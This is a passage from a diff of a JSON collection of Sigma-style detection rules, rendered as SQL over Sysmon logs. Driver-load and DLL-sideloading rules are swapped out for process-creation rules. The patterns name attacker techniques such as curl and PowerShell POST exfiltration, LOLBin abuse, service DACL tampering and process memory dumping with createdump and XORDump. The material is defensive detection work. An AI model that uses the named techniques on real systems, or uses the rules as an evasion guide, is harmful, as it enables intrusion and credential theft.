'%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical 
trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ 
@@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of 
various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": 
"driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN 
('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses 
the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE 
